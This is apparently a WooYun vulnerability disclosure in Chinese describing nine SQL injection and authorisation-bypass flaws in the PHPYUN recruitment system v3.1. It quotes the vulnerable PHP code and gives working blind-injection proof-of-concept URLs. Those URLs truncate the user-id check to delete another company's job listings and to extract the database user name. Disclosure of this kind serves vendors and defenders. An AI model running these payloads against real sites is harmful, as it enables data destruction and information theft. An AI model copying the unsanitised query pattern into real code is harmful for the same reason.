当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(3) 关注此漏洞

缺陷编号: WooYun-2014-64323

漏洞标题: PHPYUN最新版多处SQL注入及越权操作

相关厂商: php云人才系统

漏洞作者: xfkxfk认证白帽子

提交时间: 2014-06-10 14:26

公开时间: 2014-09-08 14:28

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 第三方不可信程序 安全意识不足 php源码审核 php源码分析 白盒测试 安全意识不足

0人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-10: 细节已通知厂商并且等待厂商处理中
2014-06-10: 厂商已经确认,细节仅向厂商公开
2014-06-13: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-08-04: 细节向核心白帽子及相关领域专家公开
2014-08-14: 细节向普通白帽子公开
2014-08-24: 细节向实习白帽子公开
2014-09-08: 细节向公众公开

简要描述:

PHPYUN最新版(phpyun_v3.1.0604_gbk)多处SQL注入及越权操作
这里一共存在九处SQL注入及越权操作!!!

详细说明:

这里一共存在九处SQL注入及越权操作!!!

文件/member/model/com.class.php

第一处SQL注入、越权删除职位信息:

code 区域
function job(){


......


if($_GET['del'] || is_array($_POST['checkboxid'])){





			if(is_array($_POST['checkboxid'])){


				$layer_type=1;


				$delid=@implode(",",$_POST['checkboxid']);


			}else if($_GET['del']){


				$layer_type=0;


				$delid=$_GET['del'];


			}


			$nid=$this->obj->DB_delete_all("company_job","`id` in (".$delid.") and `uid`='".$this->uid."'"," ");


			if($nid){


				$rows=$this->obj->DB_select_all("company_job","`id` in (".$delid.") and `r_status`<>'2'","`state`");


				if(is_array($rows)){


					$status0=$status1=$status2=$status3=0;


					foreach($rows as $v){


						if($v['state']=="0"){


							$status0=$status0+1;


						}elseif($v['state']=="1"){


							$status1=$status1+1;


						}elseif($v['state']=="2"){


							$status2=$status2+1;


						}elseif($v['state']=="3"){


							$status3=$status3+1;


						}


					}


					$num=count($rows);


					$value.="`status0`=`status0`-$status0,";


					$value.="`status1`=`status1`-$status1,";


					$value.="`status2`=`status2`-$status2,";


					$value.="`status3`=`status3`-$status3,";


					$value.="`job`=`job`-$num";


					$this->obj->DB_update_all("company_statis",$value,"uid='".$this->uid."'");


				}


				$newest=$this->obj->DB_select_once("company_job","`uid`='".$this->uid."' order by lastupdate DESC","`lastupdate`");


				$this->obj->update_once("company",array("jobtime"=>$newest['lastupdate']),array("uid"=>$this->uid));


				$this->layer_msg('删除成功!',9,$layer_type,$_SERVER['HTTP_REFERER']);


			}else{$this->layer_msg('删除失败!',8,$layer_type,$_SERVER['HTTP_REFERER']);}


		}



这里的$delid=$_GET['del'];

没有经过任何保护直接进入:DB_delete_all和DB_select_all

跟进DB_delete_all函数:

code 区域
function DB_delete_all($tablename, $where, $limit = 'limit 1'){


	 	$SQL = "DELETE FROM `" . $this->def . $tablename . "` WHERE $where $limit";


		$this->db->query("set `sql_mode`=''");


		return $this->db->query($SQL);



这里也没有处理,导致SQL注入

而且这里可以通过截断后面的:and `uid`='".$this->uid."'",修改uid的值,uid为用户的用户id,这样就可以越权操作,删除任意用户的职位信息了。



第二处SQL注入、越权删除用户系统信息:

code 区域
function sysnews_action(){


		if ($_POST['del']||$_GET['del']){


			if(is_array($_POST['del'])){


				$ids=@implode(',',$_POST['del']);


				$layer_type='1';


			}else if($_GET['del']){


				$ids=$_GET['del'];


				$layer_type='0';


			}


			$nid=$this->obj->DB_delete_all("sysmsg","`id` in(".$ids.") AND `fa_uid`='".$this->uid."'"," ");


			$nid?$this->layer_msg('删除成功!',9,$layer_type):$this->layer_msg('删除失败!',8,$layer_type);


		}


		$urlarr=array("c"=>"sysnews","page"=>"{{page}}");


		$pageurl=$this->url("index","index",$urlarr);


		$this->get_page("sysmsg","`fa_uid`='".$this->uid."' order by id desc",$pageurl,"10");


		$this->public_action();


		$this->yunset("js_def",7);


		$this->com_tpl('sysnews');


	}



这里的$ids=$_GET['del'];

没有经过任何保护进入了DB_delete_all函数,导致SQL注入

由于这里的fa_uid就是此用户的uder id,这里我们通过截断后面的fa_uid,修改fa_uid为任意用户的id,就可以通过越权操作,删除任意用户的系统信息了。



第三、四、五、六处SQL注入、越权操作:

code 区域
function hr_action()


	{


		if($_POST['ajax']==1 && $_POST['ids'])


		{


			$this->obj->DB_update_all("userid_job","`is_browse`='2'","`id` in (".@implode(",",$_POST['ids']).") and `com_id`='".$this->uid."'");die;//第三处ids存在注入;


		}


		if($_POST['delid']||$_GET['delid']){


			if(is_array($_POST['delid'])){


				$id=@implode(",",$_POST['delid']);


				$layer_type='1';


			}else{


				$id=$_GET['delid'];


				$layer_type='0';


			}


			$sq_num = $this->obj->DB_select_all("userid_job","`id` in (".$id.") and `com_id`='".$this->uid."'","`uid`");//第四处id=delid存在注入;


			if(is_array($sq_num)){


				foreach($sq_num as $v){


					$a[]=$v['uid'];


		    	}


			}


			$user_id=@implode(",",$a);


			$data['sq_jobnum']="`sq_jobnum`"-count($sq_num);


			$this->obj->update_once("member_statis",$data,"uid in (".$user_id.")");


			$nid=$this->obj->DB_delete_all("userid_job","`id` in (".$id.") and `com_id`='".$this->uid."'"," ");//第五处这里的id也存在注入;


			$nid?$this->layer_msg('删除成功!',9,$layer_type,"index.php?c=hr"):$this->layer_msg('删除失败!',8,$layer_type,"index.php?c=hr");


		}


		if(!empty($_GET['keyword'])){


			$rows=$this->obj->DB_select_all("resume","`name` like '%".$_GET['keyword']."%' and `r_status`<>'2'","`uid`");


			if(is_array($rows) && !empty($rows)){


				foreach($rows as $v){


					$uidarr[]=$v['uid'];


				}


				$urlarr['keyword']=$_GET['keyword'];


				$where=" uid in (".@implode(',',$uidarr).") and ";


			}


		}


		if($_GET['job_id']){


			$where ="job_id=".$_GET['job_id']." and ";


			$urlarr['job_id']=$_GET['job_id'];


		}


		$this->public_action();


		$urlarr['c']="hr";


		$urlarr['page']="{{page}}";


		$pageurl=$this->url("index","index",$urlarr);


		$rows=$this->get_page("userid_job",$where."  `com_id`='".$this->uid."'",$pageurl,"10");//第六处这里的job_id进入where存在注入


		if(is_array($rows) && !empty($rows))


		{


			foreach($rows as $v)


			{


				$uid[]=$v['uid'];


			}


			$userrows=$this->obj->DB_select_all("resume","`uid` in (".@implode(",",$uid).") and `r_status`<>'2'","`name`,`sex`,`edu`,`uid`");


			if(is_array($userrows))


			{


				include(PLUS_PATH."user.cache.php");


				foreach($rows as $k=>$v)


				{


					foreach($userrows as $val)


					{


						if($v['uid']==$val['uid'])


						{


							$rows[$k]['name']=$val['name'];


							$rows[$k]['sex']=$userclass_name[$val['sex']];


							$rows[$k]['edu']=$userclass_name[$val['edu']];


						}


					}


				}


			}


		}


		$this->yunset("rows",$rows);


		$this->company_satic();


		$this->yunset("js_def",5);


		$this->com_tpl('hr');


	}



上面的注入点都已经表名,见后面的漏洞证明,证明漏洞存在



第七处SQL注入、越权删除黑名单

code 区域
function blacklist_action()


	{


		if($_POST['delid']){


			if(is_array($_POST['delid'])){


				$id=@implode(",",$_POST['delid']);


				$layer_type='1';


			}else{


				$layer_type='0';


			}


			$id=@implode(",",$_POST['delid']);


			$nid=$this->obj->DB_delete_all("blacklist","`id` in (".$id.") and `c_uid`='".$this->uid."'"," ");


			$nid?$this->layer_msg('删除成功!',9,$layer_type,"index.php?c=blacklist"):$this->layer_msg('删除失败!',8,$layer_type,"index.php?c=blacklist");


		}



这里的$id=@implode(",",$_POST['delid']);

没有经过保护直接进入了DB_delete_all,导致SQL注入,通过截断,修改uid可以删除任意用户的黑名单信息。



第八处SQL注入、越权删除用户邀请信息

code 区域
function invite_action()


	{


		if($_POST['delid'] || $_GET['del'])


		{


			if($_GET['del'])


			{


				$id=$_GET['del'];


				$layer_type='0';


			}else{


				$id=@implode(",",$_POST['delid']);


				$layer_type='1';


			}


			$nid=$this->obj->DB_delete_all("userid_msg","`id` in (".$id.") and `fid`='".$this->uid."'"," ");


			$nid?$this->layer_msg('删除成功!',9,$layer_type,"index.php?c=invite"):$this->layer_msg('删除失败!',8,$layer_type,"index.php?c=invite");


		}



这里的$id=$_GET['del'];

没有经过保护直接进入了DB_delete_all,导致SQL注入,通过截断,修改uid可以删除任意用户的邀请信息。



第九处SQL注入、越权操作

code 区域
function down_action()


	{


		if($_POST['delid'] || $_GET['del'])


		{


			if($_GET['del'])


			{


				$id=$_GET['del'];


				$layer_type='0';


			}else{


				$id=@implode(",",$_POST['delid']);


				$layer_type='1';


			}


			$id=$_GET['del']?$_GET['del']:@implode(",",$_POST['delid']);


			$nid=$this->obj->DB_delete_all("down_resume","`id` in (".$id.") and `comid`='".$this->uid."'"," ");


			$nid?$this->layer_msg('删除成功!',9,$layer_type,"index.php?c=down"):$this->layer_msg('删除失败!',8,$layer_type,"index.php?c=down");


		}



这里的$id=$_GET['del']?$_GET['del']:@implode(",",$_POST['delid']);

没有经过保护直接进入了DB_delete_all,导致SQL注入,通过截断,修改uid可以删除任意用户信息。

漏洞证明:

这里拿第一处SQL注入、越权删除职位信息为例:

两个企业用户:

攻击者:111111,uid=3,发布的职位信息id=2,

受害者:222222,uid=4,发布的职位信息id=4,

我们先来看看用户222222发布的职位信息:

1.png



然后用户111111发送请求:

http://localhost/phpyun/member/index.php?c=job&del=if(substring(user(),1,1)=char(111),4,888))/**/and `uid`=4%23

将uid设置为受害者222222的uid=4

2.png



这然后查看用户222222的发布职位信息,仍然存在,没有删除

修改char的值,继续发送请求:

http://localhost/phpyun/member/index.php?c=job&del=if(substring(user(),1,1)=char(114),4,888))/**/and `uid`=4%23

3.png



此时在访问用户222222的发布职位信息时,职位信息已经被删除:

4.png



这列通过修改char的值,遍历得到user()=root

也通过设置uid为其他任意用户,导致越权操作,可删除其他用户的发布职位信息。

修复方案:

过滤,引号保护

版权声明:转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-06-10 14:55

厂商回复:

感谢您的提供,我们会继续完善!

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

登录后才能发表评论,请先 登录